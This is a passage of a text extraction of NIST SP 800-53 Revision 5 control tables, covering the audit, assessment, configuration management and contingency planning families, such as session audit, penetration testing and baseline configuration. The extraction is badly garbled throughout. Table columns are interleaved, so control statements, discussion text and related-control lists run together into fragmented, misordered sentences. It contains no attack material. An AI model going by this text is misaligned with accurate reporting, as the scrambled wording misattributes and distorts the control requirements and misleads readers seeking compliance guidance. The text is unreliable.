or replication relevant. Theinformation
of organizational review also provides
by external theentities
opportunity can causeto add None.
organizational new open-source information sitesoperations
with the potential to provide evidence oftounauthorized
AU-14 Session Audit a. Provide and information
implement the in an unauthorized
capability manner. organization-defined users or roles] to
for [Assignment: adverse impacts
Session audits
disclosure can on organizational
include monitoring keystrokes, and assets,
The list oftracking
including
websitesdamage visited, andreputation.
recording Such
information AC-3,
a AC-8, AU-2, AU-3, AU-4, AU-5, AU-8, AU-9, AU-11, AU-12.
[Selection (one audits
or more): record; view; hear; log] the content of a user session under [Assignment: activity canofinclude
organizational
the replicationinformation.of an organizational siteswebsite
monitored by an can be guided
adversary orand
hostileinformed
threat by
AU-14(1) Session Audit | System Start-up Initiate session automatically at system start-up. The automatic
actor who attempts initiation of session audits
to impersonate at startup helps
the web-hosting to ensureDiscovery
organization. that the information
tools, techniques, being and None.
organization-defined circumstances]; and captured on selected individuals is complete and not subject to compromise through tampering by
AU-8(1) Time Stamps | Synchronization with Authoritative Time Source [Withdrawn: Moved to SC-45(1).]
malicious threat actors.
AU-14(3) Session Audit | Remote Viewing and Listening Provide and implement the capability for authorized users to remotely view and hear content relatedNone. t AC-17.
AU-8(2) Time Stamps | Secondary Authoritative Time Source [Withdrawn: Moved to SC-45(2).]
AU-16 Cross-organizational Audit Logging Employ [Assignment: organization-defined methods] for coordinating [Assignment: organization-definWhen organizations use systems or services of external organizations, the audit logging capability ne AU-3, AU-6, AU-7, CA-3, PT-7.
AU-16(1) Cross-organizational Audit Logging | Identity Preservation Preserve the identity of individuals in cross-organizational audit trails. Identity preservation is applied when there is a need to be able to trace actions that are performed acIA-2, IA-4, IA-5, IA-8.
AU-16(2) Cross-organizational Audit Logging | Sharing of Audit Information Provide cross-organizational audit information to [Assignment: organization-defined organizations] Due to the distributed nature of the audit information, cross-organization sharing of audit informat IR-4, SI-4.
AU-16(3) Cross-organizational Audit Logging | Disassociability Implement [Assignment: organization-defined measures] to disassociate individuals from audit Preserving identities in audit trails could have privacy ramifications, such as enabling the tracking None.
CA-1 Policy and Procedures information
a. transmittedand
Develop, document, across organizational
disseminate boundaries.
to [Assignment: organization-defined personnel or roles]: and profiling authorization,
Assessment, of individuals, and but may not be operationally
monitoring necessary.
policy and procedures These the
address riskscontrols
could beinfurtherthe CA family PM-9, PS-8, SI-12.
1. [Selection (one or more): Organization-level; amplified when transmitting information across organizational boundaries. Implementing privacy-
CA-2 Control Assessments a. Select the appropriate assessor or assessmentMission/business
team for the type process-level;
of assessment System-level]
to be conducted; enhancing
Organizations ensure thattechniques
cryptographic control assessors possess the
can disassociate requiredfrom
individuals skills audit
and technical
information expertise to
and reduce AC-20, CA-5, CA-6, CA-7, PM-9, RA-5, RA-10, SA-11, SC-38, SI-3, SI-12, SR-2, SR-3.
assessment,
b. Develop authorization,
a control assessment and monitoring policy that:
CA-2(1) Control Assessments | Independent Assessors Employ independent assessors orplan that describes
assessment teams the scope ofcontrol
to conduct the assessment
assessments. including: develop effective
Independent assessment
assessors plans and
or assessment to conduct
teams assessments
are individuals of system-specific,
or groups who conduct hybrid, impartial None.
common, andofprogram management controls, asassessors
appropriate. The
free required skills includeorgeneral
CA-2(2) Control Assessments | Specialized Assessments Include as part of control assessments, [Assignment: organization-defined frequency], [Selection: an assessments Organizations
knowledge of
systems.
can
risk conduct
management
Impartiality
specialized
concepts
means
and
that
assessments,
approachesincluding areverification
as well as
from any andperceived
comprehensive validation, actual monit
system
knowledge of PE-3, SI-2.
conflicts of interest regarding the development, operation, sustainment, or management of the
CA-2(3) Control Assessments | Leveraging Results from External Organizations Leverage the results of control assessments performed by [Assignment: organization-defined extern systems Organizationsundermay rely on control
assessment assessments ofoforganizational
or the determination control effectiveness.systems To by other
achieve (external)
impartiality, organiz SA-4.
CA-3 Information Exchange a. Approve and manage the exchange of information between the system and other systems using System information exchange requirements apply to information exchanges between two or more AC-4, AC-20, AU-16, CA-6, IA-3, IR-4, PL-2, PT-7, RA-3, SA-9, SC-7, SI-12.
CA-3(1) Information Exchange | Unclassified National Security System Connections [Selection
[Withdrawn: (one or more):
Moved interconnection security agreements; information exchange security
to SC-7(25).] systems. System information exchanges include connections via leased lines or virtual private
agreements; memoranda of understanding or agreement; service level agreements; user networks, connections to internet service providers, database sharing or exchanges of database
CA-3(2) Information Exchange | Classified National Security System Connections [Withdrawn: Moved to SC-7(26).]
agreements; nondisclosure agreements; [Assignment: organization-defined type of agreement]]; transaction information, connections and exchanges with cloud services, exchanges via web-based
CA-3(3) Information Exchange | Unclassified Non-national Security System Connections [Withdrawn: Moved to SC-7(27).]
CA-3(4) Information Exchange | Connections to Public Networks [Withdrawn: Moved to SC-7(28).]
CA-3(5) Information Exchange | Restrictions on External System Connections [Withdrawn: Moved to SC-7(5).]
CA-3(6) Information Exchange | Transfer Authorizations Verify that individuals or systems transferring data between interconnecting systems have the requisite To prevent unauthorized individuals and systems from making information transfers to protected syste AC-2, AC-3, AC-4.
CA-3(7) Information Exchange | Transitive Information Exchanges (a) Identify transitive (downstream) information exchanges with other systems through the systems Transitive or downstream information exchanges are information exchanges between the system or syst SC-7.
CA-4 Security Certification identified
[Withdrawn: in CA-3a; and into CA-2.]
Incorporated
CA-5 Plan of Action and Milestones a. Develop a plan of action and milestones for the system to document the planned remediation Plans of action and milestones are useful for any type of organization to track planned remedial act CA-2, CA-7, PM-4, PM-9, RA-7, SI-2, SI-12.
CA-5(1) Plan of Action and Milestones | Automation Support for Accuracy and Currency actions the
Ensure of the organization
accuracy, currency, to correct weaknesses
and availability or deficiencies
of the plan of action noted
and during
milestonesthe assessment of
for the system Using automated tools helps maintain the accuracy, currency, and availability of the plan of action None.
the controls
using [Assignment:and to organization-defined
reduce or eliminate known vulnerabilities in the system; and
automated
CA-6 Authorization a. Assign a senior official as the authorizing official formechanisms].
the system; and milestonesare
Authorizations andofficial
facilitates the coordination
management decisions and bysharing of security
senior officials and privacy
to authorize information
operation of CA-2, CA-3, CA-7, PM-9, PM-10, RA-3, SA-10, SI-12.
b. throughout the organization.
the use of Such coordination andinheritance
informationbysharing help to identify
systems,systemic
CA-6(1) Authorization | Joint Authorization — Intra-organization Employ a joint authorization process for the system that includes multiple authorizing officials from systems,
Assign a senior official as the authorizing official for common controls available for inheritance by Assigningauthorize
weaknesses multiple authorizing
or deficiencies
common
officials from
in organizational
controlsthe for
same
systems organization
and
organizational
to appropriate
serve as co-authorizing andoffici AC-6.
organizational systems; explicitly accept the risk to organizational operations and ensure that
assets, individuals, otherresources
organizations, are
CA-6(2) Authorization | Joint Authorization — Inter-organization Employ a joint authorization process for the system that includes multiple authorizing officials with a and Assigning multiple
the Nation based authorizing officials, at leastofone
on the implementation of whom comes
agreed-upon controls. from an external
Authorizing organization,
officials providet AC-6.
CA-7 Continuous Monitoring Develop a system-level continuous monitoring strategy and implement continuous monitoring in Continuous monitoring at the system level facilitates ongoing awareness of the system security and AC-2, AC-6, AC-17, AT-4, AU-6, AU-13, CA-2, CA-5, CA-6, CM-3, CM-4, CM-6, CM-11, IA-5,
CA-7(1) Continuous Monitoring | Independent Assessment accordance
Employ with the organization-level
independent assessors or assessment continuous
teamsmonitoring
to monitorstrategy that includes:
the controls in the system on an privacy posturemaximize
Organizations to support theorganizational
value of control riskassessments
management bydecisions.
requiring The thatterms continuous
assessments be and IR-5,
None.MA-2, MA-3, MA-4, PE-3, PE-6, PE-14, PE-16, PE-20, PL-2, PM-4, PM-6, PM-9, PM-
ongoing basis.Incorporated into CA-2.] ongoing
conducted imply that organizations
by assessors with appropriateassess and monitor
levels their controlsThe
of independence. andlevel
risksofatrequired
a frequency 10, PM-12, PM-14, PM-23, PM-28, PM-31, PS-7, PT-7, RA-3, RA-5, RA-7, RA-10, SA-8, SA-
CA-7(2) Continuous Monitoring | Types of Assessments [Withdrawn: sufficient to support risk-based decisions.continuous
Different types of controls may require different
independence is based on organizational monitoring strategies. Assessor independence 9, SA-11, SC-5, SC-7, SC-18, SC-38, SC-43, SI-3, SI-4, SI-12, SR-6.
CA-7(3) Continuous Monitoring | Trend Analyses Employ trend analyses to determine if control implementations, the frequency of continuous Trend
provides analyses
a degree include examiningtorecent
of impartiality threat information
the monitoring process. To that addresses
achieve suchthe types of threat
impartiality, assessors None.
CA-7(4) Continuous Monitoring | Risk Monitoring monitoring
Ensure activities, and
risk monitoring is antheintegral
types of activities
part used in the monitoring
of the continuous continuous strategy
monitoring thatprocess
includesneed
the to Risk
events that haveisoccurred
monitoring informedinby thethe organization
establishedor the Federal Government,
organizational risk tolerance. success rates of certain None.
Effectiveness
be modified based on empirical data.
following: types of attacks, emerging thevulnerabilities in technologies, evolving social riskengineering techniques,
CA-7(5) Continuous Monitoring | Consistency Analysis Employ the following actions to validate that policies are established and implemented controls are monitoring Security
the anddetermines
effectivenessprivacy controls
of configuration
ongoing
are often effectiveness
added
settings,
of the implemented
incrementally
results from multiple to a control
system. Asresponse
a result, measures.
policies for None.
operating Compliance andmonitoring verifies that required risk response measures areassessments,
implemented. and findings
It also
CA-7(6) Continuous Monitoring | Automation Support for Monitoring Ensure theinaccuracy,
a consistent manner:
currency, and[Assignment:
availability oforganization-defined
monitoring results for actions].
the system using selecting
Using automated
verifies that
implementing
security tools for controls
monitoring
andorprivacy
may
helps
requirements
betoinconsistent,
maintain
are the
satisfied.
and the controls
accuracy,
Change
couldand
currency,
monitoring
fail availability
to work
identifies changes of None.
[Assignment: organization-defined automated mechanisms]. frequency] on [Assignment: organiz Penetration together in a consistent
monitoring information coordinated
which in turns manner.
helps At a minimum,
to increaseconducted
the level of the lack
ongoingof consistency
awareness and
of the
CA-8 Penetration Testing Conduct penetration testing [Assignment: organization-defined coordination testing
could is a specialized
mean that there type
are of assessment
unacceptable security and on systems
privacy gaps orinindividual
the system. system
At RA-5, RA-10, SA-11, SR-5, SR-6.
system security and privacy posture in that support ofbe organizational byrisk management decisions.
CA-8(1) Penetration Testing | Independent Penetration Testing Agent or Team Employ an independent penetration testing agent or team to perform penetration testing on the sy components Independent to identify
penetration vulnerabilities
testing agents could
or teams areexploited
individuals adversaries.
or groups who Penetration
conduct impartialtesting pene CA-2.
goes beyond automated vulnerability scanning and is conducted by agents and teams with
demonstrable skills and experience that include technical expertise in network, operating system,

3 of 2021-01-21
 NIST SP 800-53, Revision 5, Security and Privacy Controls for Information Systems and Organizations

CA-8(2) Penetration Testing | Red Team Exercises Employ the following red-team exercises to simulate attempts by adversaries to compromise Red team exercises extend the objectives of penetration testing by examining the security and None.
CA-8(3) Penetration Testing | Facility Penetration Testing organizational
Employ a penetrationsystemstesting
in accordance with includes
process that applicable rules of engagement:
[Assignment: [Assignment:
organization-defined frequency] [Selprivacy posture
Penetration of organizations
testing of physical accessand the capability
points to implement
can provide informationeffective cybervulnerabilities
on critical defenses. Redin t CA-2, PE-3.
organization-defined red team exercises]. team exercises simulate attempts by adversaries to compromise mission and business functions and
CA-9 Internal System Connections a. Authorize internal connections of [Assignment: organization-defined system components or Internal asystem
provide connections
comprehensive are connections
assessment betweenand
of the security organizational
privacy posture systems and separate
of systems and constituent AC-3, AC-4, AC-18, AC-19, CM-2, IA-3, SC-7, SI-12.
CA-9(1) Internal System Connections | Compliance Checks classes
Performofsecurity
components] to thecompliance
and privacy system; checks on constituent system components prior to the estabCompliance checks include verification of the relevant baseline configuration. CM-6.
CM-1 Policy and Procedures a. Develop, document, and disseminate to [Assignment: organization-defined personnel or roles]: Configuration management policy and procedures address the controls in the CM family that are impleme PM-9, PS-8, SA-8, SI-12.
CM-2 Baseline Configuration 1. Develop,
a. [Selectiondocument,
(one or more): Organization-level;
and maintain Mission/business
under configuration control,process-level; System-level]
a current baseline configuration Baseline configurations for systems and system components include connectivity, operational, and coAC-19, AU-6, CA-9, CM-1, CM-3, CM-5, CM-6, CM-8, CM-9, CP-9, CP-10, CP-12, MA-2, PL-
configuration
of the system; management
and policy that: 8, PM-5, SA-8, SA-10, SA-15, SC-18.
CM-11(1) User-installed Software | Alerts for Unauthorized Installations [Withdrawn: Incorporated into CM-8(3).]
CM-2(2) Baseline Configuration | Automation Support for Accuracy and Currency Maintain the currency, completeness, accuracy, and availability of the baseline configuration of th Automated mechanisms that help organizations maintain consistent baseline configurations for system CM-7, IA-3, RA-5.
CM-2(3) Baseline Configuration | Retention of Previous Configurations Retain [Assignment: organization-defined number] of previous versions of baseline configurations Retaining previous versions of baseline configurations to support rollback include hardware, None.
CM-2(1) Baseline Configuration | Reviews and Updates of the system to support rollback.
[Withdrawn: Incorporated into CM-2.] software, firmware, configuration files, configuration records, and associated documentation.
CM-2(4) Baseline Configuration | Unauthorized Software [Withdrawn: Incorporated into CM-7(4).]
CM-2(6) Baseline Configuration | Development and Test Environments Maintain a baseline configuration for system development and test environments that is managed sep Establishing separate baseline configurations for development, testing, and operational environmentsCM-4, SC-3, SC-7.
CM-2(7) Baseline Configuration | Configure Systems and Components for High-risk Areas (a) Issue [Assignment: organization-defined systems or system components] with [Assignment: When it is known that systems or system components will be in high-risk areas external to the organi MP-4, MP-5.
CM-3 Configuration Change Control organization-defined
a. Determine and document configurations]
the typestoofindividuals
changes totraveling
the system to locations
that are that the organization
configuration-controlled; Configuration change control for organizational systems involves the systematic proposal, justifica CA-7, CM-2, CM-4, CM-5, CM-6, CM-9, CM-11, IA-3, MA-2, PE-16, PT-6, RA-8, SA-8, SA-10,
deems
b. Reviewto be of significant
proposed risk; and
configuration-controlled changes to the system and approve or disapprove SC-28,
CM-3(1) Configuration Change Control | Automated Documentation, Notification, and Prohibition of Use [Assignment: organization-defined automated mechanisms] to: None. None. SC-34, SC-37, SI-2, SI-3, SI-4, SI-7, SI-10, SR-11.
Changes such changes with
(a) Document explicit consideration for security and privacy impact analyses;
CM-3(2) Configuration Change Control | Testing, Validation, and Documentation of Changes Test, validate, proposed
and document changes to thetosystem;
changes the system before finalizing the implementation of the Changes to systems include modifications to hardware, software, or firmware components and None.
CM-3(3) Configuration Change Control | Automated Change Implementation changes.
Implement changes to the current system baseline and deploy the updated baseline across the configuration settings defined in CM-6. Organizations ensure that testing does
Automated tools can improve the accuracy, consistency, and availability of configuration baseline None. not interfere with
CM-3(4) Configuration Change Control | Security and Privacy Representatives installed[Assignment:
Require base using [Assignment: organization-defined
organization-defined security andautomated mechanisms]. to be members of system
privacy representatives]
operations
information.
Information security
that support
Automation
and can also
privacy
organizational
provide datamission
representatives aggregation
include
and business
and data
system
functions.
correlation
security officers,
Individuals or groups
capabilities,
senior agency None.
conducting
alerting tests understand
mechanisms, security and
and dashboards privacy risk-based
to support policies and procedures, system
decision-making within security
the and
CM-3(5) Configuration Change Control | Automated Security Response the [Assignment:
Implement organization-defined
the following configuration
security responses change
automatically control element].
if baseline information
configurations are changed in organization.
Automated securityresponses
security officers, senior
include agency
haltingofficials
selected for system
privacy, or systemhalting
functions, privacy officers.
system processing, None.
an unauthorized manner: [Assignment: organization-defined security responses]. Representation
and issuing byorpersonnel
alerts withtoinformation
notifications organizational security and privacy
personnel when expertise
there is anisunauthorized
important because
CM-3(6) Configuration Change Control | Cryptography Management Ensure that cryptographic mechanisms used to provide the following controls are under configurati changes The controls referenced
to system in the control
configurations can haveenhancement
unintended refer
sidetoeffects,
securitysome
and privacy
of whichcontrols
may befrom the c SC-12.
security-
modification of a configuration item.
CM-3(7) Configuration Change Control | Review System Changes Review changes to the system [Assignment: organization-defined frequency] or when [Assignment: oIndications that warrant a review of changes to the system and the specific circumstances justifying AU-6, AU-7, CM-3.
CM-3(8) Configuration Change Control | Prevent or Restrict Configuration Changes Prevent or restrict changes to the configuration of the system under the following circumstances: System configuration changes can adversely affect critical system security and privacy functionality. None.
CM-4 Impact Analyses [Assignment:
Analyze changes organization-defined circumstances].
to the system to determine potential security and privacy impacts prior to change Change restrictions
Organizational can bewith
personnel enforced
securitythrough automated
or privacy mechanisms.
responsibilities conduct impact analyses. Individu CA-7, CM-3, CM-8, CM-9, MA-2, RA-3, RA-5, RA-8, SA-5, SA-8, SA-10, SI-2.
CM-4(1) Impact Analyses | Separate Test Environments Analyze changes to the system in a separate test environment before implementation in an operational A separate test environment requires an environment that is physically or logically separate and dis SA-11, SC-7.
CM-4(2) Impact Analyses | Verification of Controls After system changes, verify that the impacted controls are implemented correctly, operating as int Implementation in this context refers to installing changed code in the operational system that may hSA-11, SC-3, SI-6.
CM-5 Access Restrictions for Change Define, document, approve, and enforce physical and logical access restrictions associated with chanChanges to the hardware, software, or firmware components of systems or the operational procedures AC-3,
rel AC-5, AC-6, CM-9, PE-3, SC-28, SC-34, SC-37, SI-2, SI-10.
CM-5(1) Access Restrictions for Change | Automated Access Enforcement and Audit Records (a) Enforce access restrictions using [Assignment: organization-defined automated mechanisms]; Organizations log system accesses associated with applying configuration changes to ensure that conAU-2, AU-6, AU-7, AU-12, CM-6, CM-11, SI-12.
CM-2(5) Baseline Configuration | Authorized Software and
[Withdrawn: Incorporated into CM-7(5).]
CM-5(2) Access Restrictions for Change | Review System Changes [Withdrawn: Incorporated into CM-3(7).]
CM-5(4) Access Restrictions for Change | Dual Authorization Enforce dual authorization for implementing changes to [Assignment: organization-defined system c Organizations employ dual authorization to help ensure that any changes to selected system componen AC-2, AC-5, CM-3.
CM-5(5) Access Restrictions for Change | Privilege Limitation for Production and Operation (a) Limit privileges to change system components and system-related information within a In many organizations, systems support multiple mission and business functions. Limiting privilege AC-2.
CM-5(6) Access Restrictions for Change | Limit Library Privileges production or operational
Limit privileges environment;
to change software andwithin software libraries.
resident Software libraries include privileged programs. AC-2.
CM-5(3) Access Restrictions for Change | Signed Components [Withdrawn: Moved to CM-14.]
CM-6 Configuration Settings a. Establish and document configuration settings for components employed within the system that Configuration settings are the parameters that can be changed in the hardware, software, or AC-3, AC-19, AU-2, AU-6, CA-9, CM-2, CM-3, CM-5, CM-7, CM-11, CP-7, CP-9, CP-10, IA-3,
CM-6(1) Configuration Settings | Automated Management, Application, and Verification reflect
Manage, theapply,
mostand restrictive mode consistent
verify configuration withfor
settings operational
[Assignment: requirements using [Assignment:
organization-defined system com firmware
Automated components
tools (e.g., of the system
hardening that
tools, affect the
baseline security and
configuration privacy
tools) canposture
improveorthe functionality of IA-5, PL-8, PL-9, RA-5, SA-4, SA-5, SA-8, SA-9, SC-18, SC-28, SC-43, SI-2, SI-4, SI-6.
accuracy, consiCA-7.
organization-defined common secure configurations]; the system. Information technology products for which configuration settings can be defined
CM-6(2) Configuration Settings | Respond to Unauthorized Changes Take the following actions in response to unauthorized changes to [Assignment: organization-definedResponses to unauthorized changes to configuration settings include
include mainframe computers, servers, workstations, operating systems, mobile devices, alerting designated organizatio IR-4, IR-6, SI-7.
CM-5(7) Access Restrictions for Change | Automatic Implementation of Security Safeguards [Withdrawn: Incorporated into SI-7.]
CM-6(3) Configuration Settings | Unauthorized Change Detection [Withdrawn: Incorporated into SI-7.]
CM-7 Least Functionality a. Configure the system to provide only [Assignment: organization-defined mission essential Systems provide a wide variety of functions and services. Some of the functions and services routine AC-3, AC-4, CM-2, CM-5, CM-6, CM-11, RA-5, SA-4, SA-5, SA-8, SA-9, SA-15, SC-2, SC-3,
CM-7(1) Least Functionality | Periodic Review capabilities];
(a) Review theand system [Assignment: organization-defined frequency] to identify unnecessary and/or Organizations review functions, ports, protocols, and services provided by systems or system componen SC-7,
AC-18.SC-37, SI-4.
CM-7(2) Least Functionality | Prevent Program Execution nonsecure functions,
Prevent program ports, in
execution protocols,
accordancesoftware, and services;
with [Selection (oneandor more): [Assignment: organization-de Prevention of program execution addresses organizational policies, rules of behavior, and/or access CM-8, PL-4, PL-9, PM-5, PS-6.
CM-7(3) Least Functionality | Registration Compliance Ensure compliance with [Assignment: organization-defined registration requirements for functions, Organizations use the registration process to manage, track, and provide oversight for systems and None.
CM-7(4) Least Functionality | Unauthorized Software — Deny-by-exception ports, protocols,
(a) Identify and services].
[Assignment: organization-defined software programs not authorized to execute on the implemented Unauthorized functions, ports, protocols,
software programs and services.
can be limited to specific versions or from a specific source. The co CM-6, CM-8, CM-10, PL-9, PM-5.
CM-7(5) Least Functionality | Authorized Software — Allow-by-exception system];
(a) Identify [Assignment: organization-defined software programs authorized to execute on the Authorized software programs can be limited to specific versions or from a specific source. To facili CM-2, CM-6, CM-8, CM-10, PL-9, PM-5, SA-10, SC-34, SI-7.
CM-7(6) Least Functionality | Confined Environments with Limited Privileges system];
Require that the following user-installed software execute in a confined physical or virtual machine e Organizations identify software that may be of concern regarding its origin or potential for containi CM-11, SC-44.
CM-7(7) Least Functionality | Code Execution in Protected Environments Allow execution of binary or machine-executable code only in confined physical or virtual machine Code execution in protected environments applies to all sources of binary or machine-executable c CM-10, SC-44.
CM-7(8) Least Functionality | Binary or Machine Executable Code environments
(a) Prohibit theand usewith the explicit
of binary approval of [Assignment:
or machine-executable code from organization-defined
sources with limited personnel or
or no warranty Binary or machine executable code applies to all sources of binary or machine-executable code, incl SA-5, SA-22.
roles]
or when such code is:of source code; and
CM-7(9) Least Functionality | Prohibiting The Use of Unauthorized Hardware (a)without
Identify the provision
[Assignment: organization-defined hardware components authorized for system use]; Hardware components provide the foundation for organizational systems and the platform for the None.
CM-8 System Component Inventory (b)Develop
a. Prohibitand the document
use or connection of unauthorized
an inventory hardware components;
of system components that: execution
System of authorized
components are software
discrete, programs.
identifiableManaging
information thetechnology
inventory ofassets
hardware components
that include and CM-2, CM-7, CM-9, CM-10, CM-11, CM-13, CP-2, CP-9, MA-2, MA-6, PE-20, PL-9, PM-5,
hardware,
CM-8(1) System Component Inventory | Updates During Installation and Removal 1. Accurately
Update reflects the
the inventory system;components as part of component installations, removals, and syste controlling
of system software,
Organizations
which
and hardware
firmware.
can improve
components
Organizations
the accuracy, mayarechoose
permitted
completeness,
to be installed
to implement or connected
centralized
and consistency system
of system
to
component
component SA-4,
inventori
PM-16. SA-5, SI-2, SR-4.
organizational
inventories thatsystems
includeiscomponents
essential in order
from allto organizational
provide adequate security.
systems. In such situations,
CM-8(2) System Component Inventory | Automated Maintenance Maintain the currency, completeness, accuracy, and availability of the inventory of system Organizations maintain
organizations ensure system
that inventoriesinclude
the inventories to the system-specific
extent feasible. information
For example,required
virtual machines
for can None.
CM-8(3) System Component Inventory | Automated Unauthorized Component Detection components
(a) Detect theusing [Assignment:
presence organization-defined
of unauthorized automated
hardware, software, and mechanisms].
firmware components within the be difficult to
Automated monitor because
unauthorized such machines
component detectionare not visible
is applied to the network
in addition when not infor
to the monitoring use. In
unauthor AC-19, CA-7, RA-5, SC-3, SC-39, SC-44, SI-3, SI-4, SI-7.
system such cases, organizations maintain as up-to-date, complete, and accurate an inventory as is deemed
CM-8(4) System Component Inventory | Accountability Information Include using
in the[Assignment:
system component organization-defined automated
inventory information, mechanisms]
a means [Assignment:
for identifying by [Selection (one o reasonable.
Identifying individuals
Automatedwho are responsible
maintenance can beand accountable
achieved by thefor administering of
implementation system components
CM-2(2) for ensu
AC-3.
organization-defined frequency]; and
CM-6(4) Configuration Settings | Conformance Demonstration [Withdrawn: Incorporated into CM-4.]
CM-8(6) System Component Inventory | Assessed Configurations and Approved Deviations Include assessed component configurations and any approved deviations to current deployed Assessed configurations and approved deviations focus on configuration settings established by None.
CM-8(7) System Component Inventory | Centralized Repository configurations
Provide a centralizedin the system component
repository inventory.
for the inventory of system components. organizations
Organizations for maysystem components,
implement centralizedthe system
specificcomponent
componentsinventories
that have thatbeeninclude
assessed to
components None.
determine
fromuse compliance systems.
all organizational with the required
Centralizedconfiguration
repositories settings,
of systemand anyinventories
component approved deviations from
CM-8(8) System Component Inventory | Automated Location Tracking Support the tracking of system components by geographic location using [Assignment: The of automated
established configuration mechanisms
settings. to track the location of components canprovide increase the None.
organization-defined automated opportunities for efficiencies in accounting for organizational hardware, software, and firmware
CM-8(9) System Component Inventory | Assignment of Components to Systems (a) Assign system components to mechanisms].
a system; and accuracy
System
assets.
of component
components
Such repositoriesthatinventories.
are not
may also
Such capability
assigned
help to a system
organizations
maymay help
rapidly
organizations
beidentify
unmanaged,
the
rapidly
lack
location the identify
andrequired the
responsible None.
(b) Receive an acknowledgement from [Assignment: organization-defined personnel or roles] of this location andand
protection, responsible
become individuals
an of system
organizational components that have been compromised,
vulnerability.
CM-9 Configuration Management Plan Develop, document, and implement a configuration management plan for the system that: Configuration
breached, or are management
otherwise in activities
need ofoccur throughout
mitigation actions. theThesystem
use ofdevelopment life cycle.can
tracking mechanisms As such,
be CM-2, CM-3, CM-4, CM-5, CM-8, PL-2, RA-8, SA-10, SI-12.
assignment.
a. Addresses roles, responsibilities,
CM-9(1) Configuration Management Plan | Assignment of Responsibility Assign responsibility for developingand the configuration
configuration management
management processes
process toand procedures;
organizational there
In the are developmental
absence of dedicated configuration
configuration management
management activities
teams (e.g., the within
assigned controlorganizations,
of code and None.
personnel that are softwaredevelopers
libraries) and mayoperational configuration management activities (e.g., control of installed
CM-10 Software Usage Restrictions a. Use software andnot directly involved
associated in system
documentation development.
in accordance with contract agreements and system
Software license
components and tracking
how
becan
the
tasked with developing
be accomplished
components are
configuration
by manual
configured).
management
or automated
Configuration methods,
management
processes
depending
plans
usingon organ
satisfy the AC-17, AU-6, CM-7, CM-8, PM-30, SC-7.
copyrightthe laws; personnel who are not directly involved in system development or system integration. This
CM-10(1) Software Usage Restrictions | Open-source Software Establish following restrictions on the use of open-source software: [Assignment: organization-defOpen-source software refers to software that is available in source
separation of duties ensures that organizations establish and maintain a sufficient degree of code form. Certain software right SI-7.
CM-11 User-installed Software a. Establish [Assignment: organization-defined policies] governing the installation of software by If provided the necessary privileges, users can install software in organizational systems. To maintain AC-3, control
AU-6,
overCM-2,
the software
CM-3, CM-5,
installed,
CM-6, organizations
CM-7, CM-8,identify
PL-4, SI-4,
permitted
SI-7. and prohibited actions regarding soft
CM-8(5) System Component Inventory | No Duplicate Accounting of Components users;
[Withdrawn: Incorporated into CM-8.]
CM-11(2) User-installed Software | Software Installation with Privileged Status Allow user installation of software only with explicit privileged status. Privileged status can be obtained, for example, by serving in the role of system administrator. AC-5, AC-6.
CM-11(3) User-installed Software | Automated Enforcement and Monitoring Enforce and monitor compliance with software installation policies using [Assignment: organization- Organizations enforce and monitor compliance with software installation policies using automated None.
CM-12 Information Location defined
a. automated
Identify and documentmechanisms].
the location of [Assignment: organization-defined information] and the mechanisms to more addresses
Information location quickly detect and respond
the need to unauthorized
to understand software installation
where information which can
is being processed andbestor
AC-2, AC-3, AC-4, AC-6, AC-23, CM-8, PM-5, RA-2, SA-4, SA-8, SA-17, SC-4, SC-16, SC-28,
specific system components on which the information is processed information
and stored; by information an indicator of an internal or external hostile attack. SI-4,
CM-12(1) Information Location | Automated Tools to Support Information Location Use automated tools to identify [Assignment: organization-defined The use of automated tools helps to increase the effectiveness and efficiency of the information None.SI-7.
CM-13 Data Action Mapping type] on [Assignment: organization-defined
Develop and document a map of system data actions. system components] to ensure controls are in place to location capability implemented within the system. Automation also helps organizations manage
Data actions are system operations that process personally identifiable information. The processing oAC-3, CM-4, CM-12, PM-5, PM-27, PT-2, PT-3, RA-3, RA-8.
protect organizational information and individual privacy. the data produced during information location activities and share such information across the
CM-14 Signed Components Prevent the installation of [Assignment: organization-defined software and firmware components] with Software and The
organization. firmware
outputcomponents
of automated prevented
information fromlocation
installation
toolsunless
can besigned
used with recognized
to guide and informand appro
CM-7, SC-12, SC-13, SI-7.
CP-1 Policy and Procedures a. Develop, document, and disseminate to [Assignment: organization-defined personnel or roles]: Contingency planning policy and procedures address the controls in the CP family that are implemented PM-9, PS-8, SI-12.
CP-2 Contingency Plan 1. Develop
a. [Selectiona contingency
(one or more): Organization-level;
plan for the system that: Mission/business process-level; System-level] Contingency planning for systems is part of an overall program for achieving continuity of CP-3, CP-4, CP-6, CP-7, CP-8, CP-9, CP-10, CP-11, CP-13, IR-4, IR-6, IR-8, IR-9, MA-6, MP-2,
contingency planning mission
1. Identifiescontingency
essential policy that:
and business withfunctions and associated contingency requirements; operations for related
organizational mission plans
and business
CP-2(1) Contingency Plan | Coordinate with Related Plans Coordinate plan development organizational elements responsible for related Plans that are to contingency include functions. Contingency
Business Continuity planning
Plans, Disasteraddresses
Recovery MP-4,
None. MP-5, PL-2, PM-8, PM-11, SA-15, SA-20, SC-7, SC-23, SI-12.
plans. systemCritical
Plans, restoration and implementation
Infrastructure Plans, of alternative
Continuity of mission
Operations or business
Plans, Crisis processes whenPlans,
Communications systems
CP-2(2) Contingency Plan | Capacity Planning Conduct capacity planning so that necessary capacity for information processing, telecommunicationCapacity planning or
are compromised is needed
breached. because different
Contingency threatsiscan
planning result in athroughout
considered reduction of thethe available proc PE-11, PE-12, PE-13, PE-14, PE-18, SC-5.
system
Insider Threat Implementation Plans, Data Breach Response Plans, Cyber Incident Response Plans,
CP-2(3) Contingency Plan | Resume Mission and Business Functions Plan for the resumption of [Selection: all; essential] mission and business functions within Organizations may choose to conduct
Breach Response Plans, and Occupant Emergency Plans.contingency planning activities to resume mission and None.
CP-10(1) System Recovery and Reconstitution | Contingency Plan Testing [Assignment: organization-defined
[Withdrawn: Incorporated into CP-4.]time period] of contingency plan activation. business functions as part of business continuity planning or as part of business impact analyses.
Organizations prioritize the resumption of mission and business functions. The time period for
CP-2(5) Contingency Plan | Continue Mission and Business Functions Plan for the continuance of [Selection: all; essential] mission and business functions with minimal or resuming Organizationsmissionmayand choose to conduct
business functionsthemaycontingency
be dependentplanning activities
on the severityto continue
and extent mission
of theand None.
CP-2(6) Contingency Plan | Alternate Processing and Storage Sites no loss
Plan foroftheoperational
transfer ofcontinuity
[Selection:andall;sustains that
essential] continuity
mission until full functions
and business system restoration
to alternate at primary Organizations
business functions may as part of
choose to business
conduct continuity
contingency planning
planning oractivities
business for
impact analyses.
alternate Primaryand None.
processing
processing and/or
